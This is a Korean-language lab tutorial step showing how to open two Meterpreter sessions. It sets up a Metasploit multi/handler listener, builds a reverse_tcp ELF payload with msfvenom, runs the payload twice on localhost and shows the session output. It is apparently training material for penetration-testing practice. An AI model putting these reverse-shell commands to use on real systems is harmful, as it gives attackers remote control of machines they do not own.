여러 Meterpreter 또는 쉘 세션 획득
이 단계에서는 Metasploit 에 리스너를 설정한 다음 페이로드를 실행하여 두 개의 별도 Meterpreter 세션을 생성합니다. 이는 두 개의 다른 시스템에 접근하는 것을 시뮬레이션합니다.
먼저 터미널을 열고 Metasploit Framework 콘솔을 시작합니다. -q 플래그는 배너를 표시하지 않고 조용하게 시작하도록 합니다.
msfconsole -q
다음으로, 수신 연결을 기다리기 위해 multi/handler라는 일반 리스너를 구성합니다.
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
이제 -j 플래그를 사용하여 리스너를 백그라운드 작업으로 실행합니다. 이렇게 하면 리스너가 백그라운드에서 실행되는 동안 msfconsole 프롬프트에서 다른 명령을 사용할 수 있습니다.
run -j
핸들러가 시작되었다는 확인 메시지가 표시됩니다.
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
이제 이 리스너에 연결할 페이로드를 생성하고 실행해야 합니다. 터미널 창의 + 아이콘을 클릭하여 새 두 번째 터미널 탭을 엽니다.
이 새 터미널에서 msfvenom을 사용하여 페이로드를 생성합니다. 이 명령은 실행 시 리스너에 연결되는 ELF 실행 파일을 생성합니다.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
생성된 페이로드 파일에 실행 권한을 부여합니다.
chmod +x ~/project/payload.elf
이제 페이로드를 두 번 실행하여 두 개의 세션을 생성합니다. 명령을 즉시 다시 실행할 수 있도록 백그라운드 프로세스 (&) 로 실행합니다.
./payload.elf &
./payload.elf &
msfconsole이 있는 첫 번째 터미널 창으로 다시 전환합니다. 두 개의 Meterpreter 세션이 열렸다는 메시지가 표시됩니다.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38998) at 2023-10-27 10:30:00 -0400
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:39000) at 2023-10-27 10:30:05 -0400
이제 두 개의 활성 세션을 성공적으로 설정했습니다.